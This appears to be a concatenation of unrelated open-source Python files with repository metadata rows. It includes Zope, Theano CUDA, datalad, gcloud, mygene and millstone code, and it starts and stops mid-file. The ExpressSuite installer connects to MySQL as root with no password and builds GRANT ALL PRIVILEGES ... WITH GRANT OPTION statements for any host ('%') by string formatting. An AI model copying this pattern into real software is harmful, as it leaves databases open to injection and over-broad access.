p.description = description
def setupAfterCreate( self, p, create_userfolder ):
"""
Setup portal catalog and folders storage
"""
self.setupStorage( p, create_userfolder )
def _makeHeading( self, ob, id, title=None ):
"""
Creates Heading instance
"""
try:
folder = Heading( id=id, title=title )
if folder is not None:
ob._setObject( id, folder, set_owner=1 )
return 1
except:
raise
return 0
def addZMySQLConnection( dispatcher, id, title='', check=None ):
"""
Adds MySQL DB Connection
"""
connection_string = '-mysql root'
conn = SQLConnection( id, title, connection_string, check )
if conn.connected():
DB = conn._v_database_connection
if DB is not None and DB.is_opened():
instance = dispatcher.getId()
if instance:
DB.query( "CREATE DATABASE IF NOT EXISTS %s" % instance )
acl_users = aq_get(dispatcher, 'acl_users', None, 1)
if acl_users is not None:
userid = Config.SQLDBUser
user = acl_users.getUserById( userid )
passwd = user.__
servers = ( 'localhost', '%', )
for x in servers:
DB.query( "GRANT ALL PRIVILEGES ON %s.* TO '%s'@'%s' IDENTIFIED BY '%s' WITH GRANT OPTION" % ( \
instance, userid, x, passwd ) )
DB.query( "SET PASSWORD FOR '%s'@'%s' = OLD_PASSWORD('%s')" % ( \
userid, x, passwd ) )
DB.close()
if instance and userid:
connection_string = Config.connection_string % { \
'instance' : instance,
'user' : userid,
'passwd' : passwd
}
Publish.setupProduct( DB, connection_string, dispatcher )
dispatcher._setObject(id, conn)
def manage_addExpressSuiteForm( self ):
"""
Returns ExpressSuite instance generator form
"""
add_expresssuite_form = HTMLFile('dtml/addExpressSuite', globals())
all_languages = []
for lang, info in Config.Languages.items():
all_languages.append( {
'id' : lang,
'title' : info['title'],
'default' : lang == Config.DefaultLanguage,
} )
try:
from Products.TextIndexNG2 import allStemmers
all_stemmers = allStemmers(self)
except ImportError:
all_stemmers = []
return add_expresssuite_form( self, all_languages=all_languages, all_stemmers=all_stemmers )
#manage_addExpressSuiteForm.__name__ = 'addExpressSuite'
def manage_addExpressSuite( self, id='common', title='Express Suite DMS', description='',
create_userfolder=1,
email_from_address=None,
email_from_name=None,
validate_email=0,
language=None,
stemmer=None,
REQUEST=None
):
"""
Adds ExpressSuite instance
"""
id = id.strip()
server_url = self.getPhysicalRoot().absolute_url()
if email_from_address is None:
email_from_address = 'postmaster@%s' % urlparse( server_url )[1].split(':')[0]
if email_from_name is None:
email_from_name = title
gen = PortalGenerator()
p = gen.create( self, id, language, create_userfolder )
gen.setupDefaultProperties( p, id, title, description, email_from_address, email_from_name,
validate_email, server_url, stemmer )
gen.setupAfterCreate( p, create_userfolder )
if REQUEST is not None:
REQUEST.RESPONSE.redirect(p.absolute_url() + '/finish_site_construction')
| [
"[email protected]"
] | |
bebb7ac47a7598ad344f55ae7d57daba858e56ea | c07380914a44df334194f234c33858f357365c19 | /ENV/lib/python2.7/site-packages/theano/sandbox/gpuarray/neighbours.py | 1f0c7529213f8f6c6d23f989bd3a641915b97fa9 | [] | no_license | damianpolan/Music-Genre-Classification | 318952ae7de5d0b0bdf5676e28071c7b38d0e1c5 | acd723ae1432ce798866ebb97ef3c484db37e971 | refs/heads/master | 2022-12-24T09:23:55.514337 | 2016-03-22T14:49:28 | 2016-03-22T14:49:28 | 42,965,899 | 4 | 4 | null | 2022-12-12T20:26:24 | 2015-09-22T23:05:37 | Python | UTF-8 | Python | false | false | 18,919 | py | import numpy
from theano import Op, Apply, config
from theano.gof import local_optimizer
from theano.tensor.nnet.neighbours import Images2Neibs
import theano.tensor as T
try:
import pygpu
from pygpu import gpuarray, elemwise
except ImportError:
pass
from theano.sandbox.gpuarray.basic_ops import (as_gpuarray_variable,
host_from_gpu, gpu_from_host)
from theano.sandbox.gpuarray.opt import register_opt as register_gpu_opt
from theano.sandbox.gpuarray.opt import op_lifter as op_lifter
from theano.sandbox.gpuarray.type import GpuArrayType
from theano.sandbox.gpuarray.comp import NVCC_compiler
class GpuImages2Neibs(Images2Neibs, Op):
def __init__(self, mode='valid'):
if mode not in ['valid', 'ignore_borders', 'wrap_centered']:
raise NotImplementedError("Only the mode valid, ignore_borders"
" and wrap_centered"
" have been implemented for the op"
" GpuImages2Neibs")
self.mode = mode
def make_node(self, ten4, neib_shape, neib_step):
ten4 = as_gpuarray_variable(ten4)
neib_shape = T.as_tensor_variable(neib_shape)
neib_step = T.as_tensor_variable(neib_step)
assert ten4.ndim == 4
assert neib_shape.ndim == 1
assert neib_step.ndim == 1
assert "int" in neib_shape.dtype
assert "int" in neib_step.dtype
return Apply(self, [ten4, neib_shape, neib_step],
[GpuArrayType(broadcastable=(False, False),
dtype=ten4.type.dtype)()])
def c_code_cache_version(self):
return (9,1)
def c_headers(self):
return ['cuda.h', '<gpuarray/extension.h>', '<numpy_compat.h>',
'<gpuarray/ext_cuda.h>']
def c_compiler(self):
return NVCC_compiler
def c_init_code(self):
return ['setup_ext_cuda();']
def c_support_code_apply(self, node, nodename):
dtype_ten4 = node.inputs[0].dtype
dtype_z = node.outputs[0].dtype
mode = self.mode
return """
//a version that use less register but don't work in all case.
static __global__ void k_multi_warp_less_%(nodename)s(
const int nb_batch,
const int nb_stack,
const int height,
const int width,
const int c,
const int d,
const int step_x,
const int step_y,
const int grid_c,
const int grid_d,
const int stride0, const int stride1,
const int stride2, const int stride3,
npy_%(dtype_ten4)s * global_ten4,
const int out_s0, const int out_s1,
npy_%(dtype_z)s * global_out
)
{
const int wrap_centered_idx_shift_x = c/2;
const int wrap_centered_idx_shift_y = d/2;
for(int tblock = blockIdx.x*blockDim.z+threadIdx.z;
tblock<nb_batch*nb_stack*grid_c*grid_d;
tblock+=gridDim.x*blockDim.z){
const int b = tblock%%grid_d;
int left = tblock/grid_d;
const int a = left%%grid_c;
left = left/grid_c;
const int s = left%%nb_stack;
left = left/nb_stack;
const int n = left;
if(n>nb_batch)continue;
if(s>nb_stack)continue;
if(a>grid_c)continue;
if(b>grid_d)continue;
int z_row = b + grid_d*(a + grid_c*
(s + nb_stack*n));
int i = threadIdx.y; // loop over c
{
int ten4_2 = i + a * step_x;
if("%(mode)s"=="wrap_centered"){
ten4_2 -= wrap_centered_idx_shift_x;
if ( ten4_2 < 0 )
ten4_2 += height;
else if (ten4_2 >= height)
ten4_2 -= height;
}
int j = threadIdx.x; // loop over d
{
int ten4_3 = j + b * step_y;
if("%(mode)s"=="wrap_centered"){
ten4_3 -= wrap_centered_idx_shift_y;
if ( ten4_3 < 0 )
ten4_3 += width;
else if (ten4_3 >= width)
ten4_3 -= width;
}
int ten4_idx = stride3*ten4_3 +
stride2*ten4_2 +
stride1*s + stride0*n;
int z_col = j + d * i;
int z_idx = z_col * out_s1 +
z_row * out_s0;
global_out[z_idx] = global_ten4[ten4_idx];
}
}
}
}
static __global__ void k_multi_warp_%(nodename)s(
const int nb_batch,
const int nb_stack,
const int height,
const int width,
const int c,
const int d,
const int step_x,
const int step_y,
const int grid_c,
const int grid_d,
const int stride0, const int stride1,
const int stride2, const int stride3,
npy_%(dtype_ten4)s * global_ten4,
const int out_s0, const int out_s1,
npy_%(dtype_z)s * global_out
)
{
const int wrap_centered_idx_shift_x = c/2;
const int wrap_centered_idx_shift_y = d/2;
for(int tblock = blockIdx.x*blockDim.z+threadIdx.z;
tblock<nb_batch*nb_stack*grid_c*grid_d;
tblock+=gridDim.x*blockDim.z){
const int b = tblock%%grid_d;
int left = tblock/grid_d;
const int a = left%%grid_c;
left = left/grid_c;
const int s = left%%nb_stack;
left = left/nb_stack;
const int n = left;
if(n>nb_batch)continue;
if(s>nb_stack)continue;
if(a>grid_c)continue;
if(b>grid_d)continue;
int z_row = b + grid_d*(a + grid_c*
(s + nb_stack*n));
// loop over c
for (int i = threadIdx.y; i < c; i+=blockDim.y)
{
int ten4_2 = i + a * step_x;
if("%(mode)s"=="wrap_centered"){
ten4_2 -= wrap_centered_idx_shift_x;
if ( ten4_2 < 0 )
ten4_2 += height;
else if (ten4_2 >= height)
ten4_2 -= height;
}
// loop over d
for (int j = threadIdx.x; j < d; j+=blockDim.x)
{
int ten4_3 = j + b * step_y;
if("%(mode)s"=="wrap_centered"){
ten4_3 -= wrap_centered_idx_shift_y;
if ( ten4_3 < 0 )
ten4_3 += width;
else if (ten4_3 >= width)
ten4_3 -= width;
}
int ten4_idx = stride3*ten4_3 +
stride2*ten4_2 +
stride1*s + stride0*n;
int z_col = j + d * i;
int z_idx = z_col * out_s1 +
z_row * out_s0;
global_out[z_idx] = global_ten4[ten4_idx];
}
}
}
}
""" % locals()
def c_code(self, node, name, inp, out, sub):
dtype_ten4 = node.inputs[0].dtype
dtype_neib_shape = node.inputs[1].dtype
dtype_neib_step = node.inputs[2].dtype
dtype_z = node.outputs[0].dtype
itemsize_ten4 = numpy.dtype(dtype_ten4).itemsize
itemsize_z = numpy.dtype(dtype_z).itemsize
typecode_z = pygpu.gpuarray.dtype_to_typecode(node.outputs[0].dtype)
ten4, neib_shape, neib_step = inp
z, = out
fail = sub['fail']
mode = self.mode
if config.gpuarray.sync:
cnda_thread_sync = "GpuArray_sync(&%(z)s->ga);" % dict(z=z)
else:
cnda_thread_sync = ""
return """
#ifndef CEIL_INTDIV
#define CEIL_INTDIV(a, b) ((a/b) + ((a %% b) ? 1: 0))
#endif
int grid_c = -1;
int grid_d = -1;
{
if (PyGpuArray_NDIM(%(ten4)s) != 4)
{
PyErr_Format(PyExc_TypeError,
"GpuImages2Neibs: pvals wrong rank");
%(fail)s;
}
if (PyArray_NDIM(%(neib_shape)s) != 1)
{
PyErr_Format(PyExc_TypeError,
"GpuImages2Neibs: unis wrong rank");
%(fail)s;
}
if (PyArray_DIMS(%(neib_shape)s)[0] != 2)
{
PyErr_Format(PyExc_ValueError,
"GpuImages2Neibs: neib_shape has to contain two"
" elements");
%(fail)s;
}
const int c = *(npy_%(dtype_neib_shape)s*) PyArray_GETPTR1(
%(neib_shape)s, 0);
const int d = *(npy_%(dtype_neib_shape)s*) PyArray_GETPTR1(
%(neib_shape)s, 1);
const npy_intp step_x = (npy_intp) *(npy_%(dtype_neib_step)s*)
PyArray_GETPTR1(%(neib_step)s, 0);
const npy_intp step_y = (npy_intp) *(npy_%(dtype_neib_step)s*)
PyArray_GETPTR1(%(neib_step)s, 1);
if ( "%(mode)s" == "wrap_centered") {
if (c%%2!=1 || d%%2!=1){
PyErr_Format(PyExc_TypeError,
"GpuImages2Neibs: in mode wrap_centered need patch with odd shapes");
%(fail)s;
}
if ( PyGpuArray_DIMS(%(ten4)s)[2] < c ||
PyGpuArray_DIMS(%(ten4)s)[3] < d)
{
PyErr_Format(PyExc_TypeError,
"GpuImages2Neibs: in wrap_centered mode,"
" don't support image shapes smaller then"
" the patch shapes: neib_shape=(%%d,%%d),"
" ten4[2:]=[%%d,%%d]",
c, d, PyGpuArray_DIMS(%(ten4)s)[2],
PyGpuArray_DIMS(%(ten4)s)[3]);
%(fail)s;
}
grid_c = CEIL_INTDIV(((PyGpuArray_DIMS(%(ten4)s))[2]),
step_x);
grid_d = CEIL_INTDIV(((PyGpuArray_DIMS(%(ten4)s))[3]),
step_y);
}else if ( "%(mode)s" == "valid") {
if ( ((PyGpuArray_DIMS(%(ten4)s))[2] < c) ||
((((PyGpuArray_DIMS(%(ten4)s))[2]-c) %% step_x)!=0))
{
PyErr_Format(PyExc_TypeError, "GpuImages2Neibs:"
" neib_shape[0]=%%d, neib_step[0]=%%d and"
" ten4.shape[2]=%%d not consistent",
c, step_x,
PyGpuArray_DIMS(%(ten4)s)[2]);
%(fail)s;
}
if ( ((PyGpuArray_DIMS(%(ten4)s))[3] < d) ||
((((PyGpuArray_DIMS(%(ten4)s))[3]-d) %% step_y)!=0))
{
PyErr_Format(PyExc_TypeError, "GpuImages2Neibs:"
" neib_shape[1]=%%d, neib_step[1]=%%d and"
" ten4.shape[3]=%%d not consistent",
d, step_y,
PyGpuArray_DIMS(%(ten4)s)[3]);
%(fail)s;
}
//number of patch in height
grid_c = 1+(((PyGpuArray_DIMS(%(ten4)s))[2]-c)/step_x);
//number of patch in width
grid_d = 1+(((PyGpuArray_DIMS(%(ten4)s))[3]-d)/step_y);
}else if ( "%(mode)s" == "ignore_borders") {
//number of patch in height
grid_c = 1+(((PyGpuArray_DIMS(%(ten4)s))[2]-c)/step_x);
//number of patch in width
grid_d = 1+(((PyGpuArray_DIMS(%(ten4)s))[3]-d)/step_y);
}else{
PyErr_Format(PyExc_TypeError,
"GpuImages2Neibs:: unknown mode '%(mode)s'");
%(fail)s;
}
// new dimensions for z
const int z_dim1 = c * d;
const int z_dim0 = grid_c
* grid_d
* PyGpuArray_DIMS(%(ten4)s)[1]
* PyGpuArray_DIMS(%(ten4)s)[0];
if ((NULL == %(z)s)
|| (PyGpuArray_DIMS(%(z)s)[0] != z_dim0)
|| (PyGpuArray_DIMS(%(z)s)[1] != z_dim1))
{
Py_XDECREF(%(z)s);
size_t dims[2];
dims[0] = z_dim0;
dims[1] = z_dim1;
%(z)s = pygpu_empty(2, dims, %(typecode_z)s,
GA_C_ORDER, pygpu_default_context(),
Py_None);
if (!%(z)s)
{
PyErr_SetString(PyExc_MemoryError, "GpuImages2Neibs:"
" failed to alloc z output");
%(fail)s;
}
}
}
{ // NESTED SCOPE
const int nb_batch = PyGpuArray_DIMS(%(ten4)s)[0];
const int nb_stack = PyGpuArray_DIMS(%(ten4)s)[1];
const int height = PyGpuArray_DIMS(%(ten4)s)[2];
const int width = PyGpuArray_DIMS(%(ten4)s)[3];
const int c = *(npy_%(dtype_neib_shape)s*) PyArray_GETPTR1(
%(neib_shape)s, 0);
const int d = *(npy_%(dtype_neib_shape)s*) PyArray_GETPTR1(
%(neib_shape)s, 1);
const npy_intp step_x = (npy_intp) *(npy_%(dtype_neib_step)s*)
PyArray_GETPTR1(%(neib_step)s, 0);
const npy_intp step_y = (npy_intp) *(npy_%(dtype_neib_step)s*)
PyArray_GETPTR1(%(neib_step)s, 1);
dim3 n_threads(d,c,1);
//Their is a max of 512 threads per blocks
while(n_threads.x*n_threads.y>512 && n_threads.y>1)n_threads.y--;
while(n_threads.x*n_threads.y>512 && n_threads.x>1)n_threads.x--;
//Make bigger block to have better memory access pattern and
//a higher core utilisation. for smaller patch size
while(c*d*(n_threads.z+1) < 128 && n_threads.z<64 &&
n_threads.z<PyGpuArray_DIMS(%(z)s)[0]){
n_threads.z++;
}
int nb_block;
if (PyGpuArray_DIMS(%(z)s)[0] %% n_threads.z == 0)
nb_block = PyGpuArray_DIMS(%(z)s)[0] / n_threads.z;
else
nb_block = (PyGpuArray_DIMS(%(z)s)[0] / n_threads.z) + 1;
dim3 n_blocks(std::min(32*1024,nb_block));
int n_shared = 0;
void (*f)(int, int, int ,int,
int, int, int ,int,
int, int,
int, int, int, int,
npy_%(dtype_ten4)s*,
int, int,
npy_%(dtype_z)s*);
if(n_threads.x==d && n_threads.y==c){
f = k_multi_warp_less_%(name)s;
}else{
f = k_multi_warp_%(name)s;
}
f<<<n_blocks, n_threads, n_shared>>>(
nb_batch,
nb_stack,
height, width,
c, d, step_x, step_y,
grid_c, grid_d,
PyGpuArray_STRIDES(%(ten4)s)[0] / %(itemsize_ten4)s,
PyGpuArray_STRIDES(%(ten4)s)[1] / %(itemsize_ten4)s,
PyGpuArray_STRIDES(%(ten4)s)[2] / %(itemsize_ten4)s,
PyGpuArray_STRIDES(%(ten4)s)[3] / %(itemsize_ten4)s,
(npy_%(dtype_ten4)s*)(
((char *)cuda_get_ptr(%(ten4)s->ga.data)) +
%(ten4)s->ga.offset),
PyGpuArray_STRIDES(%(z)s)[0] / %(itemsize_z)s,
PyGpuArray_STRIDES(%(z)s)[1] / %(itemsize_z)s,
(npy_%(dtype_z)s*)(((char *)cuda_get_ptr(%(z)s->ga.data)) +
%(z)s->ga.offset)
);
%(cnda_thread_sync)s
cudaError_t sts = cudaGetLastError();
if (cudaSuccess != sts)
{
PyErr_Format(PyExc_RuntimeError, "GpuImages2Neibs:"
" Cuda error: %%s: %%s. (grid: %%i x %%i;"
" block: %%i x %%i x %%i; shared: %%i)\\n",
"k_multi_warp_%(name)s",
cudaGetErrorString(sts),
n_blocks.x,
n_blocks.y,
n_threads.x,
n_threads.y,
n_threads.z,
n_shared);
%(fail)s;
}
} // END NESTED SCOPE
""" % locals()
@op_lifter([Images2Neibs])
def use_gpu_images2neibs(node):
if node.op.mode in ['valid', 'ignore_borders', 'wrap_centered']:
return GpuImages2Neibs(node.op.mode)
register_gpu_opt()(use_gpu_images2neibs)
| [
"[email protected]"
] | |
8cfd3c66b9a03394e87c6cbbac0e72ae02d96b6b | 77ae7c76d36009daa01b2317439c1f975f7932b2 | /exercicios/ex115/arquivo.py | dbcbd133583ca6ae2edba87857cfb65ef4e83003 | [] | no_license | MatheusOldAccount/Exerc-cios-de-Python-do-Curso-em-Video | 5f26b5a2867fa1a2e36b486a809dfbe8b107b8c2 | 5696c49d3caf5cae817217a2da0598d1cf794f5b | refs/heads/master | 2022-03-22T10:49:33.666660 | 2019-11-25T21:24:43 | 2019-11-25T21:24:43 | 224,052,682 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | def verPessoas():
print('-' * 30)
arq = open('lista.txt', 'r')
print(arq.read())
arq.close()
def adicionarPessoas():
print('-' * 30)
arq = open('lista.txt', 'a')
nome = str(input('Nome: ')).strip().capitalize()
válido = False
while True:
try:
idade = int(input('Idade: '))
except:
print('\033[31mERRO: por favor, digite um número inteiro válido.\033[m')
else:
print(f'Novo registro de {nome} adicionado')
arq.write(f'\n{nome:<30}{idade} anos')
válido = True
if válido:
break
arq.close()
| [
"[email protected]"
] | |
a1900950b36a1a0eeada9e202f153c8985039b65 | e342abb1306e4b083f235a2992ffb863c96c9a86 | /examples/user/user_playlists.py | f71f755bceeeb2c38e3122cc3e6f50cb403624cb | [
"MIT"
] | permissive | LorenzoCavatorta/spotify.py | 102422e6588cb6c49cff026562e37f28cb0650eb | 7f375f030fbac4ef3dbbd577a898b4d72f37b72b | refs/heads/master | 2020-08-01T17:09:06.795264 | 2019-09-30T12:24:57 | 2019-09-30T12:24:57 | 211,055,943 | 0 | 0 | MIT | 2019-09-26T09:50:46 | 2019-09-26T09:50:46 | null | UTF-8 | Python | false | false | 453 | py | import asyncio
import spotify
client = spotify.Client('someid', 'somesecret')
async def main():
# You can use a user with a http presence
user = await client.user_from_token('sometoken')
# Or you can get a generic user
user = await client.get_user(user_id)
# returns a list of spotify.Playlist objects
playlists = await user.get_playlists()
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())
| [
"[email protected]"
] | |
b0e487b584903313154d9dd72e6c085f2b3b95d9 | 4664328482163fd927603d66f47209b28471cf0f | /venv/lib/python3.7/site-packages/datalad/metadata/extractors/tests/test_datacite_xml.py | 30ed2525d0915a74e0f941dc65be94d72cbe0d4c | [
"MIT"
] | permissive | emmetaobrien/dats-validator | 08706ddab795d272391b3611cd3ba0de8c4a91a1 | fb25f97a32119c2bce4eb50dc080a93d5ee77141 | refs/heads/master | 2020-12-19T05:03:17.179117 | 2020-01-22T17:28:38 | 2020-01-22T17:28:38 | 235,626,049 | 0 | 0 | MIT | 2020-01-22T17:24:56 | 2020-01-22T17:24:56 | null | UTF-8 | Python | false | false | 2,982 | py | # emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Test datacite metadata extractor """
from simplejson import dumps
from datalad.metadata.extractors.datacite import MetadataExtractor
from datalad.metadata.metadata import _get_metadatarelevant_paths
from nose.tools import assert_equal
from datalad.tests.utils import with_tree
from datalad.api import create
xml_content = """\
<?xml version="1.0" encoding="UTF-8"?>
<resource xmlns="http://datacite.org/schema/kernel-2.2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://datacite.org/schema/kernel-2.2 http://schema.datacite.org/meta/kernel-2.2/metadata.xsd">
<identifier identifierType="DOI">10.6080/K0QN64NG</identifier>
<creators>
<creator>
<creatorName>Last1, First1</creatorName>
</creator>
<creator>
<creatorName>Last2, First2</creatorName>
</creator>
</creators>
<titles>
<title>Main
title</title>
<title titleType="AlternativeTitle">CRCNS.org xxx-1</title>
</titles>
<publisher>CRCNS.org</publisher>
<publicationYear>2011</publicationYear>
<subjects>
<subject>Neuroscience</subject>
<subject>fMRI</subject>
</subjects>
<language>eng</language>
<resourceType resourceTypeGeneral="Dataset">Dataset/Neurophysiology</resourceType>
<sizes>
<size>10 GB</size>
</sizes>
<formats>
<format>application/matlab</format>
<format>NIFTY</format>
</formats>
<version>1.0</version>
<descriptions>
<description descriptionType="Other">
Some long
description.
</description>
</descriptions>
<relatedIdentifiers>
<relatedIdentifier relatedIdentifierType="DOI" relationType="IsDocumentedBy">10.1016/j.cub.2011.08.031</relatedIdentifier>
</relatedIdentifiers>
</resource>
"""
@with_tree(tree={'.datalad': {'meta.datacite.xml': xml_content}})
@with_tree(tree={'elsewhere': {'meta.datacite.xml': xml_content}})
def test_get_metadata(path1, path2):
for p in (path1, path2):
print('PATH')
ds = create(p, force=True)
ds.add('.')
meta = MetadataExtractor(
ds,
_get_metadatarelevant_paths(ds, []))._get_dataset_metadata()
assert_equal(
dumps(meta, sort_keys=True, indent=2),
"""\
{
"author": [
"Last1, First1",
"Last2, First2"
],
"citation": [
"10.1016/j.cub.2011.08.031"
],
"description": "Some long description.",
"formats": [
"application/matlab",
"NIFTY"
],
"name": "CRCNS.org xxx-1",
"sameas": "10.6080/K0QN64NG",
"shortdescription": "Main title",
"tag": [
"Neuroscience",
"fMRI"
],
"version": "1.0"
}""")
| [
"[email protected]"
] | |
59fbf899cb91638c4c208f659ae96a918d587461 | 8acffb8c4ddca5bfef910e58d3faa0e4de83fce8 | /ml-flask/Lib/site-packages/nltk/cluster/__init__.py | 38a9111e2204c7174d3bfbd82559e79570513835 | [
"MIT"
] | permissive | YaminiHP/SimilitudeApp | 8cbde52caec3c19d5fa73508fc005f38f79b8418 | 005c59894d8788c97be16ec420c0a43aaec99b80 | refs/heads/master | 2023-06-27T00:03:00.404080 | 2021-07-25T17:51:27 | 2021-07-25T17:51:27 | 389,390,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:59aceae689404a10cc3a170d5442209edea3f051e4f50c800fa557e86d234639
size 4271
| [
"[email protected]"
] | |
ad880090cfa86821407e0941820ac38bb2b6257a | e6dab5aa1754ff13755a1f74a28a201681ab7e1c | /.parts/lib/cherrypy/cherrypy/lib/static.py | 730d86b5c8aca8450f7467f6e5d78d45615cc9e1 | [] | no_license | ronkagan/Euler_1 | 67679203a9510147320f7c6513eefd391630703e | 022633cc298475c4f3fd0c6e2bde4f4728713995 | refs/heads/master | 2021-01-06T20:45:52.901025 | 2014-09-06T22:34:16 | 2014-09-06T22:34:16 | 23,744,842 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | /home/action/.parts/packages/googleappengine/1.9.4/lib/cherrypy/cherrypy/lib/static.py | [
"[email protected]"
] | |
351b4eddb3f58e872e3497a9bea27b19aa4d720f | 4d89652acca24e0bc653e0b4cb5846ceb5b568e4 | /google-cloud-sdk/lib/surface/run/domain_mappings/list.py | ab9c9af7d8e8d0e25820072bf29df8501224e959 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | ibssasimon/LyricLingo | 410fcec94d2bd3ea75c975c55713f5b8fb913229 | 0dfc951b270912470b36ce0083afd9d4fe41b10a | refs/heads/master | 2021-06-25T10:00:18.215900 | 2020-01-09T00:35:46 | 2020-01-09T00:35:46 | 222,135,399 | 2 | 1 | null | 2021-04-30T20:54:14 | 2019-11-16T17:32:19 | Python | UTF-8 | Python | false | false | 3,061 | py | # -*- coding: utf-8 -*- #
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Surface for listing all domain mappings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.run import commands
from googlecloudsdk.command_lib.run import connection_context
from googlecloudsdk.command_lib.run import flags
from googlecloudsdk.command_lib.run import pretty_print
from googlecloudsdk.command_lib.run import resource_args
from googlecloudsdk.command_lib.run import serverless_operations
from googlecloudsdk.command_lib.util.concepts import concept_parsers
from googlecloudsdk.command_lib.util.concepts import presentation_specs
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class List(commands.List):
"""Lists domain mappings."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
To list all Cloud Run domain mappings, run:
$ {command}
""",
}
@classmethod
def CommonArgs(cls, parser):
# Flags specific to connecting to a cluster
cluster_group = flags.GetClusterArgGroup(parser)
namespace_presentation = presentation_specs.ResourcePresentationSpec(
'--namespace',
resource_args.GetNamespaceResourceSpec(),
'Namespace to list domain mappings in.',
required=True,
prefixes=False)
concept_parsers.ConceptParser(
[namespace_presentation]).AddToParser(cluster_group)
parser.display_info.AddFormat(
"""table(
{ready_column},
metadata.name:label=DOMAIN,
route_name:label=SERVICE,
region:label=REGION)""".format(ready_column=pretty_print.READY_COLUMN))
parser.display_info.AddUriFunc(cls._GetResourceUri)
@classmethod
def Args(cls, parser):
cls.CommonArgs(parser)
def Run(self, args):
"""List available domain mappings."""
conn_context = connection_context.GetConnectionContext(
args, self.ReleaseTrack())
namespace_ref = args.CONCEPTS.namespace.Parse()
with serverless_operations.Connect(conn_context) as client:
self.SetCompleteApiEndpoint(conn_context.endpoint)
return commands.SortByName(client.ListDomainMappings(namespace_ref))
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class AlphaList(List):
"""Lists domain mappings."""
@classmethod
def Args(cls, parser):
cls.CommonArgs(parser)
AlphaList.__doc__ = List.__doc__
| [
"[email protected]"
] | |
657337bf90a24e453740657f6c0d434ef21313c9 | cf62f7a7f9e13205fe83957fb7bfcf1b097bf481 | /src/index.py | a2ae504efaedb021f53a79f53ead655fd59982c9 | [
"Apache-2.0"
] | permissive | biothings/mygene.info | 09bf19f481c066789a4ad02a0d2880f31dae28f6 | fe1bbdd81bc29b412ca4288d3af38e47c0602ab7 | refs/heads/master | 2023-08-22T21:34:43.540840 | 2023-08-08T23:25:15 | 2023-08-08T23:25:18 | 54,933,630 | 89 | 20 | NOASSERTION | 2023-07-18T23:53:49 | 2016-03-29T00:36:49 | Python | UTF-8 | Python | false | false | 757 | py | """
Mygene Web Server Entry Point
Examples:
>>> python index.py
>>> python index.py --debug
>>> python index.py --port=8000
"""
import os.path
import config
from biothings.web.launcher import main
ADDON_HANDLERS = [
(r"/demo/?(.*)", "tornado.web.StaticFileHandler",
{"path": "docs/demo", "default_filename": "index.html"}),
]
if config.INCLUDE_DOCS:
if not os.path.exists(config.DOCS_STATIC_PATH):
raise IOError('Run "make html" to generate sphinx docs first.')
ADDON_HANDLERS += [
(r"/widget/(.*)", "tornado.web.RedirectHandler", {"url": "/static/widget/{0}"}),
(r"/?(.*)", "tornado.web.StaticFileHandler", {'path': config.DOCS_STATIC_PATH}),
]
if __name__ == '__main__':
main(ADDON_HANDLERS)
| [
"[email protected]"
] | |
981f3b685443c1e8fabdc340684e1a4a52e41de2 | e15fb687990589783066669784912ea8ac5bacaf | /genome_designer/test_data/full_vcf_test_set/generate_full_vcf_test_set.py | 9dac81496c35a6bb2eaa6bc20477bb1f155f8606 | [
"MIT"
] | permissive | RubensZimbres/millstone | 74d32105fa54104d0597b6789fb2871cb4fbd854 | 898936072a716a799462c113286056690a7723d1 | refs/heads/master | 2020-03-16T18:57:55.174716 | 2018-03-07T16:40:14 | 2018-03-07T16:40:14 | 132,894,394 | 1 | 2 | null | 2018-05-10T12:01:34 | 2018-05-10T12:01:33 | null | UTF-8 | Python | false | false | 5,259 | py | """
Script for generating the test set.
This document describes how this test test was generated.
1) Select a region of the MG1655 genome to excise.
"""
import copy
import random
from Bio import SeqIO
import vcf
import simNGS_util
# Portion of MG1655 Genbank of size ~5.5 kB
EXCISED_GENBANK = 'mg1655_tolC_through_zupT.gb'
TEMPLATE_VCF = 'template.vcf'
VCF_TEMPLATE_READER = vcf.Reader(TEMPLATE_VCF)
SAMPLE_FASTA_ROOT = 'sample'
DESIGNED_SNP_VCF = 'designed_snps.vcf'
# If we do a SNP every 100 bases, that's 50 SNPs.
# We'll then do 20 designed SNPs and 20 SNPs per sample so we should get
# fairly interesting overlaps.
TOTAL_SNPS = 50
NUM_IN_CDS = 45
NUM_OTHER = TOTAL_SNPS - NUM_IN_CDS
# We'll create this many genomes.
NUM_SAMPLES = 6
def is_position_in_coding_feature(position, cds_features):
"""Checks whether the given position lies inside of a coding feature
in the given genome record.
"""
for feature in cds_features:
if (feature.location.start <= position and
position < feature.location.end):
return True
return False
BASE_OPTIONS = ['A', 'T', 'G', 'C']
def choose_alt(ref):
"""Returns a random base that is not ref.
"""
alt = ref
while alt == ref:
alt = random.choice(BASE_OPTIONS)
return alt
def get_subset_of_snps(all_snps, subset_size):
all_snp_positions = all_snps.keys()
subset = {}
while len(subset) < subset_size:
pos = random.choice(all_snp_positions)
if pos in subset:
continue
subset[pos] = all_snps[pos]
return subset
def create_vcf_for_subset(subset, out_path):
with open(out_path, 'w') as designed_fh:
